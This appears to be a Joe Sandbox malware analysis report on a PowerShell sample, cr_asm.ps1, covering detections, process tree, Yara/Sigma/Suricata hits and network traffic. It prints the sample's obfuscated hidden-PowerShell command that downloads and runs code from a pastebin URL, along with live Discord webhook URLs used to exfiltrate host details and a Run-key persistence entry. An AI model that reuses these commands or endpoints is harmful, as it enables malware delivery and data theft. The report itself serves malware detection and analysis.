Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cr_asm.ps1

Overview

General Information

Sample name:cr_asm.ps1
Analysis ID:1534101
MD5:ad55efa7fa18623e107d6945bf6f6167
SHA1:9e8677a71ab2deb025102e0a189bfc008f6ef8b3
SHA256:415982006ceb36b43714fe259e96d6e2b1174a3441c5e3beb30fe479642c2d75
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 320 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 7092 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2740 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 6496 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1960 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4144INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x15eaf4:$b1: ::WriteAllBytes(
  • 0x63755:$s1: -join
  • 0x7082a:$s1: -join
  • 0x73bfc:$s1: -join
  • 0x742ae:$s1: -join
  • 0x75d9f:$s1: -join
  • 0x77fa5:$s1: -join
  • 0x787cc:$s1: -join
  • 0x7903c:$s1: -join
  • 0x79777:$s1: -join
  • 0x797a9:$s1: -join
  • 0x797f1:$s1: -join
  • 0x79810:$s1: -join
  • 0x7a060:$s1: -join
  • 0x7a1dc:$s1: -join
  • 0x7a254:$s1: -join
  • 0x7a2e7:$s1: -join
  • 0x7a54d:$s1: -join
  • 0x7c6e3:$s1: -join
  • 0x8b12d:$s1: -join
  • 0xa0875:$s1: -join
Process Memory Space: powershell.exe PID: 5424INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1d3e:$b1: ::WriteAllBytes(
  • 0x172b24:$b1: ::WriteAllBytes(
  • 0x17ab3c:$b1: ::WriteAllBytes(
  • 0xb8ace:$s1: -join
  • 0xbaa84:$s1: -join
  • 0x14558b:$s1: -join
  • 0x145ceb:$s1: -join
  • 0x511c0:$s3: reverse
  • 0x57e15:$s3: reverse
  • 0x59e09:$s3: reverse
  • 0x64e38:$s3: reverse
  • 0x10fb95:$s3: reverse
  • 0x11b56c:$s3: reverse
  • 0x15eecb:$s3: reverse
  • 0x168ee6:$s3: reverse
  • 0x17fdc3:$s3: reverse
  • 0x1800b1:$s3: reverse
  • 0x1807cb:$s3: reverse
  • 0x180f84:$s3: reverse
  • 0x185b13:$s3: reverse
  • 0x185f2d:$s3: reverse
Process Memory Space: powershell.exe PID: 1196INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x19f888:$b1: ::WriteAllBytes(
  • 0x1a61df:$b1: ::WriteAllBytes(
  • 0x77257:$s1: -join
  • 0x86fc6:$s1: -join
  • 0xb4afd:$s1: -join
  • 0xb525d:$s1: -join
  • 0x12a018:$s3: reverse
  • 0x133efb:$s3: reverse
  • 0x145330:$s3: reverse
  • 0x150ca0:$s3: reverse
  • 0x158c47:$s3: reverse
  • 0x15f87b:$s3: reverse
  • 0x1618ec:$s3: reverse
  • 0x16c91b:$s3: reverse
  • 0x17dfa6:$s3: reverse
  • 0x17e294:$s3: reverse
  • 0x17e9ae:$s3: reverse
  • 0x17f167:$s3: reverse
  • 0x186355:$s3: reverse
  • 0x18676f:$s3: reverse
  • 0x1872f7:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_5424.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_1196.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7092, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 2740, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1", ProcessId: 4144, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4144, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1", ProcessId: 4144, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:52:46.406820+020028576591A Network Trojan was detected192.168.2.549812162.159.138.232443TCP
2024-10-15T15:52:52.200537+020028576591A Network Trojan was detected192.168.2.549847162.159.138.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:52:32.753901+020028576581A Network Trojan was detected192.168.2.549736162.159.138.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.9% probability
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49847 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.5:49812 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.5:49847 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.5:49736 -> 162.159.138.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 215Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 300Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 300Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 215Expect: 100-continueConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2336301168.000001CA385FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD940D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000000.00000002.2378501269.000001CA46840000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2519977279.0000029CD8464000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD89B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD89D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014926B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000C.00000002.2577990183.0000014926B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2519977279.0000029CD8A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000C.00000002.2577990183.0000014927147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000000.00000002.2336301168.000001CA367D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD7F7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014926666000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2382925415.000001CA4EA80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.2336301168.000001CA3863B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD9543000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
Source: powershell.exe, 00000000.00000002.2336301168.000001CA3863B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD9543000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000000.00000002.2336301168.000001CA367D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD7F7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD7FBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014926674000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149266AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2336301168.000001CA3850B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD940D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000000.00000002.2336301168.000001CA3863B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD9543000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 00000008.00000002.2519977279.0000029CD940D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000008.00000002.2519977279.0000029CD8B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149271E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000C.00000002.2577990183.00000149271E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmp, cr_asm.ps1String found in binary or memory: https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kN
Source: powershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2336301168.000001CA37725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD8464000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014926B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2378501269.000001CA46840000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
